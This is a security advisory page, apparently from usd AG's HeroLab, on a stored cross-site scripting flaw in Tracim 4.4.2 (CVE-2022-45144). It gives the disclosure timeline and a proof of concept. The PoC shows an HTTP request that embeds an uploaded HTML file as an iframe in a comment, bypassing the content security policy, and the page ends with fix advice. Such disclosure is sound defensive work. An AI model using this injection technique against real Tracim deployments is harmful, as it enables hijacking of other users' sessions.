{"id":20113,"date":"2023-05-05T14:50:33","date_gmt":"2023-05-05T12:50:33","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=20113"},"modified":"2024-10-07T13:48:51","modified_gmt":"2024-10-07T11:48:51","slug":"usd-2022-0048","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2022-0048\/","title":{"rendered":"usd-2022-0048"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.16\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.23.1\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]<\/p>\n

usd-2022-0048 | Tracim 4.4.2 - Stored Cross-Site Scripting<\/h1>\n

<\/span>
Advisory ID<\/strong>: usd-2022-0048<\/span>
Affected Product<\/strong>: Tracim<\/span>
Affected Version<\/strong>: 4.4.2 (probably others too)<\/span>
Vulnerability Type<\/strong>: Cross-Site Scripting (CWE-79)<\/span>
Security Risk<\/strong>: High<\/span>
Vendor URL<\/strong>: https:\/\/tracim.fr <\/a>
Vendor Acknowledged Vulnerability<\/strong>: Yes
<\/span>Vendor Status<\/strong>: Fixed
CVE ID<\/strong>: CVE-2022-45144
CVE Link:<\/strong> https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2022-45144<\/a>
<\/span><\/p>\n

The following behavior was reported to Tracim in November 2022. After several contact attempts, the usd AG Responsible Disclosure Team did not receive any response. In order to inform the users of Tracim about the unresolved vulnerability, the advisory was published in accordance with our Responsible Disclosure Policy<\/a>.
<\/em><\/p>\n

<\/em><\/p>\n

Edit 07-10-2024: <\/em><\/p>\n

<\/em><\/p>\n

The Tracim team informed us that this vulnerability is fixed in version 4.11.1. They thanked us for our feedback and mentioned that since then their internal processes for handling vulnerability disclosures have been improved.
<\/em><\/p>\n

<\/span><\/p>\n

Description<\/h3>\n

Tracim is a collaborative platform software that allows teams to share and work on various types of data and documents. The application allows uploads of HTML files, which leads to a stored Cross-Site-Scripting attack.<\/p>\n

Additionally to the stored XSS vulnerability, the impact can be increased by using a HTML injection in the comments feature. This endpoint usually blocks XSS attempts using a CSP, which can be bypassed. The tested version was Tracim 4.4.2.<\/p>\n

<\/span><\/p>\n

Proof of Concept (PoC)<\/h3>\n

The application allows to upload HTML files, which can be viewed in \"raw\" using a link similar to the one below:<\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.20.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" global_colors_info=\"{}\"]<\/p>\n

http:\/\/localhost:8080\/api\/workspaces\/1\/files\/19\/raw\/test.html<\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.21.0\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]<\/p>\n

This upload functionality makes the application vulnerable to a stored XSS, because the uploaded file is rendered in the context of the application.<\/p>\n

Tracim implements the following CSP:<\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.20.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" global_colors_info=\"{}\"]<\/p>\n

Content-Security-Policy: script-src 'unsafe-eval' 'nonce-67c3972badf9a5c68a68fb5b107ab5f0ce1c8d0b15e6b9342d68b53f56cd4238'; style-src 'unsafe-inline' 'self'; connect-src 'self'; font-src data: blob: *; img-src data: blob: *; media-src data: blob: *; frame-src * 'self'; object-src 'none'; default-src 'self'<\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.20.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\" global_colors_info=\"{}\"]<\/p>\n

To attack more users from inside the application one needs to bypass the CSP and embed the uploaded file in a commonly visited place. Tracim allows injection of HTML into a comment. The endpoint uses a CSP to block XSS attempts. However, the CSP can be bypassed using our uploaded HTML file as an iframe source.<\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.20.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" global_colors_info=\"{}\"]<\/p>\n

POST \/api\/workspaces\/1\/contents\/22\/comments HTTP\/1.1
Host: localhost:8080
User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:103.0) Gecko\/20100101 Firefox\/103.0
Accept: application\/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http:\/\/localhost:8080\/ui\/workspaces\/1\/publications<\/a>
X-Tracim-ClientToken: ed6ba1bc-fae7-49cd-9490-8c38dd33ba13
Content-Type: application\/json
Content-Length: 164
Origin: http:\/\/localhost:8080<\/p>\n

[...]<\/p>\n

{\"raw_content\":\"<iframe src=\\\"http:\/\/localhost:8080\/api\/workspaces\/1\/files\/19\/raw\/test.html\\\"><\/iframe>\",\"content_namespace\":\"publication\"}<\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.23.1\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]<\/p>\n

\n
\n

Fix<\/h3>\n

It is recommended to treat all input on the website as potentially dangerous. Hence, all output that is dynamically generated based on user-controlled data should be encoded according to its context. The majority of programming languages support standard procedures for encoding meta characters. Also it is recommended to restrict the allowed file types in the file upload function.<\/p>\n

 <\/p>\n

Users of Tracim can upgrade to version 4.11.1.<\/p>\n

<\/h3>\n

References<\/h3>\n